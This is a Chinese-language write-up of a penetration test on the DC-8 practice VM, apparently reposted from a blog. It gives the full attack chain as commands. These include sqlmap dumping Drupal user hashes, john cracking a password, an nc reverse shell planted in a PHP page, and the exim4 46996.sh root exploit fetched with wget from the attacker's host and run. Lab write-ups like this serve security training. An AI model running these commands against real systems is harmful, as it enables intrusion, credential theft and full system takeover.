文章目錄

• • • 一、信息收集
    • • 1.主機發現
      • 2.端口掃描
    • 二、漏洞挖掘、利用
    • • 1.訪問靶機 web 服務
      • 2.使用 SQLmap 進行爆內容
      • 3.使用 john 進行爆破 hash
      • 4.目錄掃描
      • 5.登陸后臺進行查找可編輯 PHP 頁面
      • 6.獲取 shell
    • 三、提權
    • • 1.嘗試 suid 提權
      • 2.使用 python 獲得交互式 shell
      • 3.嘗試使用 exim4 進行提權

環境版本：

• VMware pro 16
• Kali 2021.1(虛擬機)
• DC-8(虛擬機)

一、信息收集

1.主機發現

arp-scan -l

發現靶機 ip 為192.168.1.111

2.端口掃描

nmap -A -p- 192.168.1.111

發現其開啟了 22 ssh、80 web服務 drupal cms

二、漏洞挖掘、利用

1.訪問靶機 web 服務

對其進行信息收集（遍歷網頁）

在點擊 welcome to dc-8 后發現 url 帶了 nid 嘗試 SQLmap 梭

2.使用 SQLmap 進行爆內容

sqlmap -u http://192.168.1.111/?nid=1 --dbs
sqlmap -u http://192.168.1.111/?nid=1 -D d7db --tables 
sqlmap -u http://192.168.1.111/?nid=1 -D d7db -T users --columns
sqlmap -u http://192.168.1.111/?nid=1 -D d7db -T users -C uid,name,pass --dump

3.使用 john 進行爆破 hash

1)將 pass 內容每行一個保存到 DC7-pass.txt
2)進行爆破

john ./DC7-pass.txt

只爆破出 1 個，測試得知其為 john 賬號密碼

john turtle

4.目錄掃描

進行目錄掃描查找入口點

nikto -h 192.168.1.111

5.登陸后臺進行查找可編輯 PHP 頁面

插入 nc 連接

6.獲取 shell

1)靶機監聽

nc -lvvp 9999

2)提交表單頁面執行 php 代碼進行觸發

得到靶機 shell

三、提權

1.嘗試 suid 提權

find / -perm -u=s -type f 2>/dev/null

發現 exim4

2.使用 python 獲得交互式 shell

python -c "import pty;pty.spawn('/bin/sh')"

3.嘗試使用 exim4 進行提權

1)查看版本信息

exim4 --version

2)在 kali 中搜索相關漏洞

searchsploit exim 4

使用

Exim 4.87 - 4.91 - Local Privilege Escalation       | linux/local/46996.sh

查看 exp 其內容

cd /usr/share/exploitdb/exploits/linux/local 
cat 46996.sh

發現兩種執行方式，這里我們使用第二種

3)將 exp 復制到桌面

cp /usr/share/exploitdb/exploits/linux/local/46996.sh /root/Desktop/exp.sh

4)查看 exp 格式

vim ./exp.sh 
:set ff    #查看文件格式 
:set ff=unix    #更改文件格式

5)使用 python 打開 http 服務進行傳輸文件

cd /root/Desktop 
python -m SimpleHTTPServer 8888

6)靶機 shell 使用 wget 獲取文件、利用

cd /tmp    #進入tmp目錄，我們使用的exp需要寫權限，tmp目錄所有用戶權限均為7 
wget http://192.168.1.123:8888/exp.sh    #使用wget獲取exp 
chmod 777 ./exp.sh    #增加權限 
./exp.sh -m netcat    #使用腳本

得到權限

cat /root/flag.txt

總結

以上是生活随笔為你收集整理的DC8靶机渗透测试的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。